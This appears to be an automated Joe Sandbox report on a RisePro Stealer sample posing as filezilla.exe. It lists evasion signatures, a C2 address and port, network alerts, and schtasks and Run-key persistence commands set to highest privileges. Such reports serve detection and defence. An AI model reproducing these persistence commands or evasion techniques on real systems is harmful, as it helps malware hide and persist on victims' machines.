Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LisectAVT_2403002A_140.exe

Overview

General Information

Sample name:LisectAVT_2403002A_140.exe
Analysis ID:1482502
MD5:8623f3410c6571a3880ed83c11197518
SHA1:35396e27d5528a5c4740a93be024ec11db698df2
SHA256:421f1f9e96fc1d6d553fa47a0ae79c23751471a02174524465eff1f6ec1fe897
Tags:exe
Infos:

Detection

RisePro Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Yara detected RisePro Stealer
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Uses schtasks.exe or at.exe to add and modify task schedules
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • LisectAVT_2403002A_140.exe (PID: 5440 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002A_140.exe" MD5: 8623F3410C6571A3880ED83C11197518)
    • schtasks.exe (PID: 7252 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7300 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • MPGPH131.exe (PID: 7348 cmdline: C:\ProgramData\MPGPH131\MPGPH131.exe MD5: 8623F3410C6571A3880ED83C11197518)
  • MPGPH131.exe (PID: 7356 cmdline: C:\ProgramData\MPGPH131\MPGPH131.exe MD5: 8623F3410C6571A3880ED83C11197518)
  • RageMP131.exe (PID: 7644 cmdline: "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe" MD5: 8623F3410C6571A3880ED83C11197518)
  • RageMP131.exe (PID: 8008 cmdline: "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe" MD5: 8623F3410C6571A3880ED83C11197518)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
    00000000.00000003.1709813394.00000000055E0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
      00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmpJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
        0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmpJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
          00000007.00000003.1856862638.0000000004E60000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
            Click to see the 10 entries

            System Summary

            barindex
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\LisectAVT_2403002A_140.exe, ProcessId: 5440, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RageMP131
            No Snort rule has matched
            Timestamp:2024-07-25T23:54:39.250102+0200
            SID:2046269
            Source Port:49740
            Destination Port:58709
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T23:54:23.985535+0200
            SID:2046269
            Source Port:49731
            Destination Port:58709
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T23:55:09.658050+0200
            SID:2022930
            Source Port:443
            Destination Port:49741
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T23:54:15.323291+0200
            SID:2049060
            Source Port:49730
            Destination Port:58709
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T23:54:23.985696+0200
            SID:2046269
            Source Port:49732
            Destination Port:58709
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T23:54:32.109492+0200
            SID:2046269
            Source Port:49734
            Destination Port:58709
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T23:54:18.312575+0200
            SID:2046269
            Source Port:49730
            Destination Port:58709
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T23:54:21.006750+0200
            SID:2049060
            Source Port:49732
            Destination Port:58709
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T23:54:30.562029+0200
            SID:2022930
            Source Port:443
            Destination Port:49733
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: LisectAVT_2403002A_140.exeAvira: detected
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeAvira: detection malicious, Label: TR/Redcap.dchmo
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeAvira: detection malicious, Label: TR/Redcap.dchmo
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeJoe Sandbox ML: detected
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeJoe Sandbox ML: detected
            Source: LisectAVT_2403002A_140.exeJoe Sandbox ML: detected
            Source: LisectAVT_2403002A_140.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

            Networking

            barindex
            Source: global trafficTCP traffic: 193.233.132.74 ports 0,5,7,8,58709,9
            Source: global trafficTCP traffic: 192.168.2.4:49730 -> 193.233.132.74:58709
            Source: Joe Sandbox ViewIP Address: 193.233.132.74 193.233.132.74
            Source: Joe Sandbox ViewASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.74
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.74
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.74
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.74
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.74
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.74
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.74
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.74
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.74
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.74
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.74
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.74
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.74
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.74
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.74
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.74
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.74
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.74
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.74
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.74
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.74
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.74
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.74
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.74
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.74
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeCode function: 0_2_00D3E0A0 recv,setsockopt,WSAStartup,closesocket,socket,connect,closesocket,0_2_00D3E0A0
            Source: LisectAVT_2403002A_140.exe, 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, LisectAVT_2403002A_140.exe, 00000000.00000003.1709813394.00000000055E0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000005.00000002.4145805846.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, MPGPH131.exe, 00000005.00000003.1776201948.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.1776987778.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.4145632604.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, RageMP131.exe, 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, RageMP131.exe, 00000007.00000003.1856862638.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, RageMP131.exe, 0000000B.00000003.1935348315.0000000004B80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
            Source: LisectAVT_2403002A_140.exe, 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, LisectAVT_2403002A_140.exe, 00000000.00000003.1709813394.00000000055E0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000005.00000002.4145805846.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, MPGPH131.exe, 00000005.00000003.1776201948.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.1776987778.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.4145632604.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, RageMP131.exe, 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, RageMP131.exe, 00000007.00000003.1856862638.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, RageMP131.exe, 0000000B.00000003.1935348315.0000000004B80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll
            Source: LisectAVT_2403002A_140.exe, 00000000.00000002.4147804202.000000000181E000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000005.00000002.4147850074.00000000011AD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.4147764213.000000000169B000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000007.00000002.4148390163.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000B.00000002.4148938152.0000000000F6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/RiseProSUPPORT
            Source: RageMP131.exe, 00000007.00000002.4148390163.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/RiseProSUPPORT;
            Source: RageMP131.exe, 0000000B.00000002.4148938152.0000000000F6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/RiseProSUPPORTR

            System Summary

            barindex
            Source: LisectAVT_2403002A_140.exeStatic PE information: section name:
            Source: LisectAVT_2403002A_140.exeStatic PE information: section name: .idata
            Source: LisectAVT_2403002A_140.exeStatic PE information: section name:
            Source: RageMP131.exe.0.drStatic PE information: section name:
            Source: RageMP131.exe.0.drStatic PE information: section name: .idata
            Source: RageMP131.exe.0.drStatic PE information: section name:
            Source: MPGPH131.exe.0.drStatic PE information: section name:
            Source: MPGPH131.exe.0.drStatic PE information: section name: .idata
            Source: MPGPH131.exe.0.drStatic PE information: section name:
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeCode function: 0_2_00DA98800_2_00DA9880
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeCode function: 0_2_00D950B00_2_00D950B0
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeCode function: 0_2_00E198240_2_00E19824
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeCode function: 0_2_00D291A00_2_00D291A0
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeCode function: 0_2_00D973F00_2_00D973F0
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeCode function: 0_2_00E02CE00_2_00E02CE0
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeCode function: 0_2_00D224F00_2_00D224F0
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeCode function: 0_2_00E084A00_2_00E084A0
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeCode function: 0_2_00E0646A0_2_00E0646A
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeCode function: 0_2_00DA55B00_2_00DA55B0
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeCode function: 0_2_00DA65500_2_00DA6550
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeCode function: 0_2_00D28D700_2_00D28D70
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeCode function: 0_2_00E0BEAF0_2_00E0BEAF
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeCode function: 0_2_00D39F500_2_00D39F50
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeCode function: 0_2_00E1F7710_2_00E1F771
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 5_2_00A950B05_2_00A950B0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 5_2_00AA98805_2_00AA9880
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 5_2_00B198245_2_00B19824
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 5_2_00A291A05_2_00A291A0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 5_2_00A973F05_2_00A973F0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 5_2_00B084A05_2_00B084A0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 5_2_00B02CE05_2_00B02CE0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 5_2_00A224F05_2_00A224F0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 5_2_00B0646A5_2_00B0646A
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 5_2_00AA55B05_2_00AA55B0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 5_2_00A28D705_2_00A28D70
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 5_2_00AA65505_2_00AA6550
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 5_2_00B0BEAF5_2_00B0BEAF
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 5_2_00B1F7715_2_00B1F771
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 5_2_00A39F505_2_00A39F50
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A950B06_2_00A950B0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00AA98806_2_00AA9880
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00B198246_2_00B19824
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A291A06_2_00A291A0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A973F06_2_00A973F0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00B084A06_2_00B084A0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00B02CE06_2_00B02CE0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A224F06_2_00A224F0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00B0646A6_2_00B0646A
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00AA55B06_2_00AA55B0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A28D706_2_00A28D70
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00AA65506_2_00AA6550
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00B0BEAF6_2_00B0BEAF
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00B1F7716_2_00B1F771
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A39F506_2_00A39F50
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 7_2_003B98247_2_003B9824
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 7_2_003350B07_2_003350B0
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 7_2_003498807_2_00349880
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 7_2_002C91A07_2_002C91A0
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 7_2_003373F07_2_003373F0
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 7_2_003A646A7_2_003A646A
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 7_2_003A84A07_2_003A84A0
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 7_2_003A2CE07_2_003A2CE0
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 7_2_002C24F07_2_002C24F0
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 7_2_002C8D707_2_002C8D70
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 7_2_003465507_2_00346550
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 7_2_003455B07_2_003455B0
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 7_2_003ABEAF7_2_003ABEAF
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 7_2_003BF7717_2_003BF771
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 7_2_002D9F507_2_002D9F50
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 11_2_003B982411_2_003B9824
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 11_2_003350B011_2_003350B0
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 11_2_0034988011_2_00349880
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 11_2_002C91A011_2_002C91A0
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 11_2_003373F011_2_003373F0
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 11_2_003A646A11_2_003A646A
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 11_2_003A84A011_2_003A84A0
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 11_2_003A2CE011_2_003A2CE0
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 11_2_002C24F011_2_002C24F0
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 11_2_002C8D7011_2_002C8D70
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 11_2_0034655011_2_00346550
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 11_2_003455B011_2_003455B0
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 11_2_003ABEAF11_2_003ABEAF
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 11_2_003BF77111_2_003BF771
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 11_2_002D9F5011_2_002D9F50
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: String function: 0039FED0 appears 52 times
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: String function: 00AFFED0 appears 52 times
            Source: LisectAVT_2403002A_140.exe, 00000000.00000002.4152424609.00000000055E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefilezilla.exe4 vs LisectAVT_2403002A_140.exe
            Source: LisectAVT_2403002A_140.exe, 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamefilezilla.exe4 vs LisectAVT_2403002A_140.exe
            Source: LisectAVT_2403002A_140.exeBinary or memory string: OriginalFilenamefilezilla.exe4 vs LisectAVT_2403002A_140.exe
            Source: LisectAVT_2403002A_140.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: LisectAVT_2403002A_140.exeStatic PE information: Section: ZLIB complexity 0.9993574134199135
            Source: LisectAVT_2403002A_140.exeStatic PE information: Section: yxaifgwn ZLIB complexity 0.9896825177147919
            Source: RageMP131.exe.0.drStatic PE information: Section: ZLIB complexity 0.9993574134199135
            Source: RageMP131.exe.0.drStatic PE information: Section: yxaifgwn ZLIB complexity 0.9896825177147919
            Source: MPGPH131.exe.0.drStatic PE information: Section: ZLIB complexity 0.9993574134199135
            Source: MPGPH131.exe.0.drStatic PE information: Section: yxaifgwn ZLIB complexity 0.9896825177147919
            Source: classification engineClassification label: mal100.troj.evad.winEXE@11/5@0/1
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeFile created: C:\Users\user\AppData\Local\RageMP131Jump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7260:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7308:120:WilError_03
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeFile created: C:\Users\user\AppData\Local\Temp\rage131MP.tmpJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeCommand line argument: nI0_2_00E248C0
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCommand line argument: nI<7_2_003C48C0
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCommand line argument: nI<11_2_003C48C0
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: LisectAVT_2403002A_140.exe, 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, LisectAVT_2403002A_140.exe, 00000000.00000003.1709813394.00000000055E0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000005.00000002.4145805846.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, MPGPH131.exe, 00000005.00000003.1776201948.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.1776987778.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.4145632604.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, RageMP131.exe, 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, RageMP131.exe, 00000007.00000003.1856862638.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, RageMP131.exe, 0000000B.00000003.1935348315.0000000004B80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: LisectAVT_2403002A_140.exe, 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, LisectAVT_2403002A_140.exe, 00000000.00000003.1709813394.00000000055E0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000005.00000002.4145805846.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, MPGPH131.exe, 00000005.00000003.1776201948.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.1776987778.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.4145632604.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, RageMP131.exe, 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, RageMP131.exe, 00000007.00000003.1856862638.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, RageMP131.exe, 0000000B.00000003.1935348315.0000000004B80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
            Source: LisectAVT_2403002A_140.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
            Source: MPGPH131.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
            Source: MPGPH131.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
            Source: RageMP131.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
            Source: RageMP131.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeFile read: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\LisectAVT_2403002A_140.exe "C:\Users\user\Desktop\LisectAVT_2403002A_140.exe"
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
            Source: unknownProcess created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
            Source: unknownProcess created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeSection loaded: ntasn1.dllJump to behavior
